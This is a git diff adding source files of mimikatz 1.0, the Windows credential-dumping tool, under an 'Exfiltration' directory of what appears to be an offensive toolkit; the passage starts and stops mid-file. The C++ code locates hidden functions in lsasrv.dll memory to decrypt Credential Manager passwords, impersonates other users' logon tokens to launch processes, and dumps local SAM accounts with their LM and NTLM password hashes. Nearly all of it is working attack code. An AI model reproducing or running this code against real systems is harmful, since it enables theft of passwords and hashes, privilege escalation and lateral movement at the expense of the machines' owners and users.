+				offset	= OFFS_WNO8_CrediEnumerate;
+			}
+			else
+			{
+				pattern	= PTRN_WIN8_CrediEnumerate;
+				taille	= sizeof(PTRN_WIN8_CrediEnumerate);
+				offset	= OFFS_WIN8_CrediEnumerate;
+			}
+		}
+#elif defined _M_IX86
+		if(mod_system::GLOB_Version.dwMajorVersion < 6)
+		{
+			pattern	= PTRN_WIN5_CrediEnumerate;
+			taille	= sizeof(PTRN_WIN5_CrediEnumerate);
+		}
+		else
+		{
+			if(mod_system::GLOB_Version.dwMinorVersion < 1)
+			{
+				pattern	= PTRN_WN60_CrediEnumerate;
+				taille	= sizeof(PTRN_WN60_CrediEnumerate);
+			}
+			else if (mod_system::GLOB_Version.dwMinorVersion < 2)
+			{
+				pattern	= PTRN_WN61_CrediEnumerate;
+				taille	= sizeof(PTRN_WN61_CrediEnumerate);
+			}
+			else
+			{
+				pattern	= PTRN_WN62_CrediEnumerate;
+				taille	= sizeof(PTRN_WN62_CrediEnumerate);
+			}
+		}
+		offset = OFFS_WALL_CrediEnumerate;
+#endif
+		mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&CredIEnumerate), L"lsasrv", pattern, taille, offset, NULL, true, true);
+	}
+	return (searchLSAFuncs() && CredIEnumerate);
+}
+
+__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	wostringstream monStream;
+	monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchCredmanFuncs() ? L"OK :)" : L"KO :(") << endl << endl <<
+		L"@CredIEnumerate     = " << CredIEnumerate << endl <<
+		L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl;
+	return sendTo(monPipe, monStream.str());
+}
+
+__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getCredmanData, wstring(L"credman")));
+	return getLogonData(monPipe, mesArguments, &monProvider);
+}
+
+bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
+{
+	wostringstream message;
+	if(searchCredmanFuncs())
+	{
+		DWORD credNb = 0;
+		PCREDENTIAL * pCredential = NULL;
+		DWORD CredIEnumerateFlags = (mod_system::GLOB_Version.dwMajorVersion < 6) ? 0 : CRED_ENUMERATE_ALL_CREDENTIALS;
+		NTSTATUS status = (mod_system::GLOB_Version.dwBuildNumber < 8000 ) ? CredIEnumerate(logId, 0, NULL, CredIEnumerateFlags, &credNb, &pCredential) : reinterpret_cast<PCRED_I_ENUMERATE62>(CredIEnumerate)(logId, NULL, CredIEnumerateFlags, &credNb, &pCredential);
+
+		if(NT_SUCCESS(status))
+		{
+			for(DWORD i = 0; i < credNb; i++)
+			{
+				wstring Target(pCredential[i]->TargetName);
+				wstring ShortTarget = (mod_system::GLOB_Version.dwMajorVersion < 6) ? Target : Target.substr(Target.find_first_of(L'=') + 1);
+					
+				message << endl;
+				if(justSecurity)
+					message << L"\t [" << i << L"] " << Target << L'\t';
+				else message <<
+					L"\t * [" << i << L"] Target   : " << Target << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl <<
+					L"\t * [" << i << L"] Comment  : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl <<
+					L"\t * [" << i << L"] User     : " << (pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>") << endl;
+					
+				if((pCredential[i]->Type != CRED_TYPE_GENERIC) && (pCredential[i]->Type != CRED_TYPE_GENERIC_CERTIFICATE))
+				{
+					CREDENTIAL_TARGET_INFORMATION mesInfos = {const_cast<wchar_t *>(ShortTarget.c_str()), NULL, NULL, NULL, NULL, NULL, NULL, pCredential[i]->Flags, 0 , NULL};
+					DWORD dwNbCredentials;
+					PENCRYPTED_CREDENTIALW * pEncryptedCredential;
+					NTSTATUS status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential);
+					if(status == STATUS_INVALID_PARAMETER)
+					{
+						mesInfos.Flags |= CRED_TI_USERNAME_TARGET;
+						status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential);
+					}
+					if(NT_SUCCESS(status))
+					{
+						for(DWORD j = 0; j < dwNbCredentials ; j++)
+						{
+							wostringstream prefix; prefix << L"[" << j << L"] ";
+							message << descEncryptedCredential(pEncryptedCredential[j], justSecurity, prefix.str());
+						}
+						SeckPkgFunctionTable->CrediFreeCredentials(dwNbCredentials, pEncryptedCredential);
+					}
+					else message << L"Erreur CrediReadDomainCredentials : " << mod_system::getWinError(false, status);
+				}
+				else
+				{
+					PENCRYPTED_CREDENTIALW pEncryptedCredential;
+					NTSTATUS status = SeckPkgFunctionTable->CrediRead(logId, CREDP_FLAGS_IN_PROCESS, const_cast<wchar_t *>(ShortTarget.c_str()), pCredential[i]->Type, 0, &pEncryptedCredential);
+					if(NT_SUCCESS(status))
+					{
+						message << descEncryptedCredential(pEncryptedCredential, justSecurity);
+						CredFree(pEncryptedCredential);
+					}
+					else message << L"Erreur CrediRead : " << mod_system::getWinError(false, status);
+				}
+			}
+			CredFree(pCredential);
+		}
+		else message << L"CredIEnumerate KO : " << mod_system::getWinError(false, status);
+	} else message << L"n.a. (credman KO)";
+	return sendTo(monPipe, message.str());
+}
+
+wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix)
+{
+	wostringstream monStream;
+
+	LSA_UNICODE_STRING encryptedPassword = {pEncryptedCredential->Cred.CredentialBlobSize, pEncryptedCredential->Cred.CredentialBlobSize, reinterpret_cast<PWSTR>(pEncryptedCredential->Cred.CredentialBlob)};
+	wstring cred = getPasswordFromProtectedUnicodeString(&encryptedPassword);
+							
+	if(justSecurity)
+		monStream << L"- {" << pEncryptedCredential->Cred.UserName << L" ; " << cred << L" } ";
+	else monStream <<
+			L"\t       " << prefix << L"User : " << pEncryptedCredential->Cred.UserName << endl <<
+			L"\t       " << prefix << L"Cred : " << cred << endl;
+					
+	return monStream.str();
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h
new file mode 100644
index 0000000..60d1249
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h
@@ -0,0 +1,19 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../sekurlsa.h"
+
+bool searchCredmanFuncs();
+__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments);
+bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
+
+wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix = L"");
+
+typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE)	(IN PLUID pLUID, IN DWORD unk0,	IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials);
+typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE62) (IN PLUID pLUID,				IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials);
+
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp
new file mode 100644
index 0000000..7284da7
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp
@@ -0,0 +1,88 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "incognito.h"
+
+bool searchIncognitoFuncs()
+{
+	return searchLSAFuncs();
+}
+
+__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getTokenData, wstring(L"token")));
+	return getLogonData(monPipe, mesArguments, &monProvider);
+}
+
+__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	wostringstream monStream;
+	if(searchIncognitoFuncs())
+	{
+		if(!mesArguments->empty() && ((mesArguments->size() == 3) || (mesArguments->size() == 4)))
+		{
+			wstring idSecAppHigh = L"0", idSecAppLow = mesArguments->front(), session = mesArguments->at(1), maLigne = mesArguments->back();
+			if(mesArguments->size() == 4)
+			{
+				idSecAppHigh = idSecAppLow;
+				idSecAppLow = mesArguments->at(1);
+				session = mesArguments->at(2);
+			}
+			LUID monLUID = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
+			DWORD maSession = _wtoi(session.c_str());
+			HANDLE monToken;
+			monStream << L" * OpenTokenByLogonId({" << monLUID.LowPart << L";" << monLUID.HighPart << L"}) : ";
+			NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(&monLUID, &monToken);
+			if(NT_SUCCESS(status))
+			{
+				monStream << L"OK !" << endl <<
+					L" * SetTokenInformation(TokenSessionId@" << maSession << L") : ";
+				if(SetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD)) != 0)
+				{
+					monStream << L"OK !" << endl <<
+						L" * CreateProcessAsUser(Token@{" << monLUID.LowPart << L";" << monLUID.HighPart << L"}, TokenSessionId@" << maSession << L", \"" << maLigne << L"\") : ";
+					PROCESS_INFORMATION mesInfosProcess;
+					if(mod_process::start(&maLigne, &mesInfosProcess, false, false, monToken))
+					{
+						monStream << L"OK - pid = " << mesInfosProcess.dwProcessId << endl;
+						CloseHandle(mesInfosProcess.hThread);
+						CloseHandle(mesInfosProcess.hProcess);
+					}
+					else monStream << L"KO - " << mod_system::getWinError() << endl;
+					CloseHandle(monToken);
+				}
+				else monStream << L"KO - " << mod_system::getWinError() << endl;
+			}
+			else monStream << L"KO - " << mod_system::getWinError(false, status) << endl;
+		}
+		else monStream << L"Format d\'appel invalide : incognito [idSecAppHigh] idSecAppLow sessionDst ligneDeCommande" << endl;		
+	}
+	return sendTo(monPipe, monStream.str());
+}
+
+bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
+{
+	wostringstream monStream;
+	if(searchIncognitoFuncs())
+	{
+		HANDLE monToken;
+		NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(logId, &monToken);
+		if(NT_SUCCESS(status))
+		{
+			monStream << L"Disponible !";
+			DWORD maSession, tailleRetournee;
+			if(GetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD), &tailleRetournee) != 0)
+			{
+				monStream << L" - session d\'origine " << maSession;
+				CloseHandle(monToken);
+			}
+			else monStream << L"Indisponible - SetTokenInformation KO : " << mod_system::getWinError() << endl;
+		}
+		else monStream << L"OpenTokenByLogonId KO : " << mod_system::getWinError(false, status) << endl;
+	}
+	return sendTo(monPipe, monStream.str());
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h
new file mode 100644
index 0000000..a8eae58
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h
@@ -0,0 +1,13 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../sekurlsa.h"
+
+bool searchIncognitoFuncs();
+__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments);
+bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp
new file mode 100644
index 0000000..5555b58
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp
@@ -0,0 +1,479 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "sam.h"
+
+PSAM_I_CONNECT SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(NULL);
+PSAM_R_OPEN_DOMAIN SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(NULL);
+PSAM_R_OPEN_USER SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(NULL);
+PSAM_R_ENUMERATE_USERS_IN_DOMAIN SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(NULL);
+PSAM_R_QUERY_INFORMATION_USER SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(NULL);
+PSAM_I_FREE_SAMPR_USER_INFO_BUFFER SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(NULL);
+PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(NULL);
+PSAM_R_CLOSE_HANDLE SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(NULL);
+PSAM_I_GET_PRIVATE_DATA SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(NULL);
+PSYSTEM_FUNCTION_025 SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(NULL);
+PSYSTEM_FUNCTION_027 SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(NULL);
+
+bool searchSAMFuncs()
+{
+	if(!(SamIConnect &&
+		SamrOpenDomain &&
+		SamrOpenUser &&
+		SamrEnumerateUsersInDomain &&
+		SamrQueryInformationUser &&
+		SamIFree_SAMPR_USER_INFO_BUFFER &&
+		SamIFree_SAMPR_ENUMERATION_BUFFER &&
+		SamrCloseHandle &&
+		SamIGetPrivateData &&
+		SystemFunction025 &&
+		SystemFunction027))
+	{
+		HMODULE hSamsrv = GetModuleHandle(L"samsrv");
+		HMODULE hAdvapi32 = GetModuleHandle(L"advapi32");
+
+		if(hSamsrv && hAdvapi32)
+		{
+			SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(GetProcAddress(hSamsrv, "SamIConnect"));
+			SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(GetProcAddress(hSamsrv, "SamrOpenDomain"));
+			SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(GetProcAddress(hSamsrv, "SamrOpenUser"));
+			SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(GetProcAddress(hSamsrv, "SamrEnumerateUsersInDomain"));
+			SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(GetProcAddress(hSamsrv, "SamrQueryInformationUser"));
+			SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER"));
+			SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER"));
+			SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(GetProcAddress(hSamsrv, "SamrCloseHandle"));
+			SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(GetProcAddress(hSamsrv, "SamIGetPrivateData"));
+			SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(GetProcAddress(hAdvapi32, "SystemFunction025"));
+			SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(GetProcAddress(hAdvapi32, "SystemFunction027"));
+		}
+		return (SamIConnect &&
+			SamrOpenDomain &&
+			SamrOpenUser &&
+			SamrEnumerateUsersInDomain &&
+			SamrQueryInformationUser &&
+			SamIFree_SAMPR_USER_INFO_BUFFER &&
+			SamIFree_SAMPR_ENUMERATION_BUFFER &&
+			SamrCloseHandle);
+	}
+	else return true;
+}
+
+__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	wostringstream monStream;
+	monStream << L"** samsrv.dll/advapi32.dll ** ; Statut recherche : " << (searchSAMFuncs() ? L"OK :)" : L"KO :(") << endl << endl <<
+		L"@SamIConnect                       = " << SamIConnect << endl <<
+		L"@SamrOpenDomain                    = " << SamrOpenDomain << endl <<
+		L"@SamrOpenUser                      = " << SamrOpenUser << endl <<
+		L"@SamrEnumerateUsersInDomain        = " << SamrEnumerateUsersInDomain << endl <<
+		L"@SamrQueryInformationUser          = " << SamrQueryInformationUser << endl <<
+		L"@SamIFree_SAMPR_USER_INFO_BUFFER   = " << SamIFree_SAMPR_USER_INFO_BUFFER << endl <<
+		L"@SamIFree_SAMPR_ENUMERATION_BUFFER = " << SamIFree_SAMPR_ENUMERATION_BUFFER << endl <<
+		L"@SamrCloseHandle                   = " << SamrCloseHandle << endl <<
+		L"@SamIGetPrivateData                = " << SamIGetPrivateData << endl <<
+		L"@SystemFunction025                 = " << SystemFunction025 << endl <<
+		L"@SystemFunction027                 = " << SystemFunction027 << endl;
+	return sendTo(monPipe, monStream.str());
+}
+
+__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	if(searchSAMFuncs())
+	{
+		bool sendOk = true, history = true, isCSV = false;
+		USER_INFORMATION_CLASS monType = UserInternal1Information;
+
+		if(!mesArguments->empty())
+		{
+			isCSV = ((_wcsicmp(mesArguments->front().c_str(), L"/csv") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/csv") == 0);
+			monType = (((_wcsicmp(mesArguments->front().c_str(), L"/full") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/full") == 0) ? UserAllInformation : UserInternal1Information);
+		}
+
+		LSA_HANDLE handlePolicy = NULL;
+		HSAM handleSam = NULL;
+		HDOMAIN handleDomain = NULL;
+		HUSER handleUser = NULL;
+
+		LSA_OBJECT_ATTRIBUTES objectAttributes;
+		memset(&objectAttributes, NULL, sizeof(objectAttributes));
+		PPOLICY_ACCOUNT_DOMAIN_INFO ptrPolicyDomainInfo;
+
+		NTSTATUS retourEnum = 0;
+		PSAMPR_ENUMERATION_BUFFER ptrStructEnumUser = NULL;
+		DWORD EnumerationContext = 0;
+		DWORD EnumerationSize = 0;
+
+		PSAMPR_USER_INFO_BUFFER ptrMesInfosUsers = NULL;
+
+		if(NT_SUCCESS(LsaOpenPolicy(NULL, &objectAttributes, POLICY_ALL_ACCESS, &handlePolicy)))
+		{
+			if(NT_SUCCESS(LsaQueryInformationPolicy(handlePolicy, PolicyAccountDomainInformation, reinterpret_cast<PVOID *>(&ptrPolicyDomainInfo))))
+			{
+				if(NT_SUCCESS(SamIConnect(NULL, &handleSam, 1, SAM_SERVER_CONNECT)))
+				{
+					if(NT_SUCCESS(SamrOpenDomain(handleSam, DOMAIN_ALL_ACCESS, ptrPolicyDomainInfo->DomainSid, &handleDomain)))
+					{
+						wstring domainName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName);
+						do
+						{
+							retourEnum = SamrEnumerateUsersInDomain(handleDomain, &EnumerationContext, NULL, &ptrStructEnumUser, 1000, &EnumerationSize);
+							if(NT_SUCCESS(retourEnum) || retourEnum == STATUS_MORE_ENTRIES)
+							{
+								for(DWORD numUser = 0; numUser < ptrStructEnumUser->EntriesRead && sendOk; numUser++)
+								{
+									wstring monUserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name);
+									ptrMesInfosUsers = NULL;
+
+									if(NT_SUCCESS(SamrOpenUser(handleDomain, USER_ALL_ACCESS, ptrStructEnumUser->Buffer[numUser].RelativeId, &handleUser)))
+									{
+										if(NT_SUCCESS(SamrQueryInformationUser(handleUser, monType, &ptrMesInfosUsers)))
+										{
+											WUserAllInformation mesInfos = UserInformationsToStruct(monType, ptrMesInfosUsers);
+											mesInfos.UserId = ptrStructEnumUser->Buffer[numUser].RelativeId;
+											mesInfos.DomaineName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName);
+
+											if(mesInfos.UserName.empty())
+												mesInfos.UserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name);
+
+											sendOk = descrToPipeInformations(monPipe, monType, mesInfos, isCSV);
+											SamIFree_SAMPR_USER_INFO_BUFFER(ptrMesInfosUsers, monType);
+										}
+										
+										if(history && SamIGetPrivateData != NULL)
+										{
+											sendOk = descrUserHistoryToPipe(monPipe, ptrStructEnumUser->Buffer[numUser].RelativeId, monUserName, domainName, handleUser, monType, isCSV);
+										}
+										SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleUser));
+									}
+									else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir l\'objet utilisateur\n");
+								}
+								SamIFree_SAMPR_ENUMERATION_BUFFER(ptrStructEnumUser);
+							}
+							else sendOk = sendTo(monPipe, L"Echec dans l\'obtention de la liste des objets\n");
+
+						} while(retourEnum == STATUS_MORE_ENTRIES && sendOk);
+						SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleDomain));
+					}
+					else sendOk = sendTo(monPipe, L"Impossible d\'obtenir les information sur le domaine\n");
+					SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleSam));
+				}
+				else sendOk = sendTo(monPipe, L"Impossible de se connecter à la base de sécurité du domaine\n");
+				LsaFreeMemory(ptrPolicyDomainInfo);
+			}
+			else sendOk = sendTo(monPipe, L"Impossible d\'obtenir des informations sur la politique de sécurité\n");
+			LsaClose(handlePolicy);
+		}
+		else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir la politique de sécurité\n");
+
+		return sendOk;
+	}
+	else return getSAMFunctions(monPipe, mesArguments);
+}
+
+bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV)
+{
+	wstringstream maReponse;
+
+	switch(type)
+	{
+	case UserInternal1Information:
+		if(isCSV)
+		{
+			maReponse <<
+				mesInfos.UserId << L";" <<
+				mesInfos.UserName << L";" <<
+				mesInfos.DomaineName << L";" <<
+				mesInfos.LmOwfPassword << L";" <<
+				mesInfos.NtOwfPassword << L";"
+				;
+		}
+		else
+		{
+			maReponse << 
+				L"ID                      : " << mesInfos.UserId << endl <<
+				L"Nom                     : " << mesInfos.UserName << endl <<
+				L"Domaine                 : " << mesInfos.DomaineName << endl <<
+				L"Hash LM                 : " << mesInfos.LmOwfPassword << endl <<
+				L"Hash NTLM               : " << mesInfos.NtOwfPassword << endl
+				;
+		}
+		break;
+	case UserAllInformation:
+		if(isCSV)
+		{
+			maReponse <<
+				mesInfos.UserId << L';' <<
+				mesInfos.UserName << L';' <<
+				mesInfos.DomaineName << L';' <<
+				protectMe(mesInfos.FullName) << L';' <<
+				mesInfos.isActif << L';' <<
+				mesInfos.isLocked << L';' <<
+				mesInfos.TypeCompte << L';' <<
+				protectMe(mesInfos.UserComment) << L';' <<
+				protectMe(mesInfos.AdminComment) << L';' <<
+				mesInfos.AccountExpires_strict << L';' <<
+				protectMe(mesInfos.WorkStations) << L';' <<
+				protectMe(mesInfos.HomeDirectory) << L';' <<
+				protectMe(mesInfos.HomeDirectoryDrive) << L';' <<
+				protectMe(mesInfos.ProfilePath) << L';' <<
+				protectMe(mesInfos.ScriptPath) << L';' <<
+				mesInfos.LogonCount << L';' <<
+				mesInfos.BadPasswordCount << L';' <<
+				mesInfos.LastLogon_strict << L';' <<
+				mesInfos.LastLogoff_strict << L';' <<
+				mesInfos.PasswordLastSet_strict << L';' <<
+				mesInfos.isPasswordNotExpire << L';' <<
+				mesInfos.isPasswordNotRequired << L';' <<
+				mesInfos.isPasswordExpired << L';' <<
+				mesInfos.PasswordCanChange_strict << L';' <<
+				mesInfos.PasswordMustChange_strict << L';' <<
+				mesInfos.LmOwfPassword << L';' <<
+				mesInfos.NtOwfPassword << L';'
+				;
+		}
+		else
+		{
+			maReponse << boolalpha <<
+				L"Compte" << endl <<
+				L"======" << endl <<
+				L"ID                      : " << mesInfos.UserId << endl <<
+				L"Nom                     : " << mesInfos.UserName << endl <<
+				L"Domaine                 : " << mesInfos.DomaineName << endl <<
+				L"Nom complet             : " << mesInfos.FullName << endl <<
+				L"Actif                   : " << mesInfos.isActif << endl <<
+				L"Verouillé               : " << mesInfos.isLocked << endl <<
+				L"Type                    : " << mesInfos.TypeCompte << endl <<
+				L"Commentaire utilisateur : " << mesInfos.UserComment << endl <<
+				L"Commentaire admin       : " << mesInfos.AdminComment << endl <<
+				L"Expiration              : " << mesInfos.AccountExpires << endl <<
+				L"Station(s)              : " << mesInfos.WorkStations << endl <<
+				endl <<
+				L"Chemins" << endl <<
+				L"-------" << endl <<
+				L"Répertoire de base      : " << mesInfos.HomeDirectory << endl <<
+				L"Lecteur de base         : " << mesInfos.HomeDirectoryDrive << endl <<
+				L"Profil                  : " << mesInfos.ProfilePath << endl <<
+				L"Script de démarrage     : " << mesInfos.ScriptPath << endl <<
+				endl <<
+				L"Connexions" << endl <<
+				L"----------" << endl <<
+				L"Nombre                  : " << mesInfos.LogonCount << endl <<
+				L"Echecs                  : " << mesInfos.BadPasswordCount << endl <<
+				L"Dernière connexion      : " << mesInfos.LastLogon << endl <<
+				L"Dernière déconnexion    : " << mesInfos.LastLogoff << endl <<
+				endl <<
+				L"Mot de passe" << endl <<
+				L"------------" << endl <<
+				L"Dernier changement      : " << mesInfos.PasswordLastSet << endl <<
+				L"N\'expire pas            : " << mesInfos.isPasswordNotExpire << endl <<
+				L"Peut être vide          : " << mesInfos.isPasswordNotRequired << endl <<
+				L"Mot de passe expiré     : " << mesInfos.isPasswordExpired << endl <<
+				L"Possibilité changement  : " << mesInfos.PasswordCanChange << endl <<
+				L"Obligation changement   : " << mesInfos.PasswordMustChange << endl <<
+				endl <<			
+				L"Hashs" << endl <<
+				L"-----" << endl <<
+				L"Hash LM                 : " << mesInfos.LmOwfPassword << endl <<
+				L"Hash NTLM               : " << mesInfos.NtOwfPassword << endl <<
+				endl
+				;
+		}
+		break;
+	}
+
+	maReponse << endl;
+	return sendTo(monPipe, maReponse.str());
+}
+
+WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr)
+{
+	WUserAllInformation mesInfos;
+	PSAMPR_USER_INTERNAL1_INFORMATION ptrPassword = NULL;
+	PSAMPR_USER_ALL_INFORMATION ptrAllInformations = NULL;
+
+	switch(type)
+	{
+	case UserInternal1Information:
+		ptrPassword = reinterpret_cast<PSAMPR_USER_INTERNAL1_INFORMATION>(monPtr);
+
+		mesInfos.LmPasswordPresent = ptrPassword->LmPasswordPresent != 0;
+		mesInfos.NtPasswordPresent = ptrPassword->NtPasswordPresent != 0;
+
+		if(mesInfos.LmPasswordPresent)
+			mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedLmOwfPassword.data, sizeof(ptrPassword->EncryptedLmOwfPassword.data));
+		if(mesInfos.NtPasswordPresent)
+			mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedNtOwfPassword.data, sizeof(ptrPassword->EncryptedNtOwfPassword.data));
+		break;
+
+	case UserAllInformation:
+		ptrAllInformations = reinterpret_cast<PSAMPR_USER_ALL_INFORMATION>(monPtr);
+
+		mesInfos.UserId = ptrAllInformations->UserId;
+		mesInfos.UserName = mod_text::stringOfSTRING(ptrAllInformations->UserName);
+		mesInfos.FullName = mod_text::stringOfSTRING(ptrAllInformations->FullName); correctMe(mesInfos.FullName);
+		
+		mesInfos.isActif = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_DISABLED) == 0;
+		mesInfos.isLocked = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_AUTO_LOCKED) != 0;
+
+		if(ptrAllInformations->UserAccountControl & USER_SERVER_TRUST_ACCOUNT)
+			mesInfos.TypeCompte.assign(L"Contrôleur de domaine");
+		else if(ptrAllInformations->UserAccountControl & USER_WORKSTATION_TRUST_ACCOUNT)
+			mesInfos.TypeCompte.assign(L"Ordinateur");
+		else if(ptrAllInformations->UserAccountControl & USER_NORMAL_ACCOUNT)
+			mesInfos.TypeCompte.assign(L"Utilisateur");
+		else
+			mesInfos.TypeCompte.assign(L"Inconnu");
+
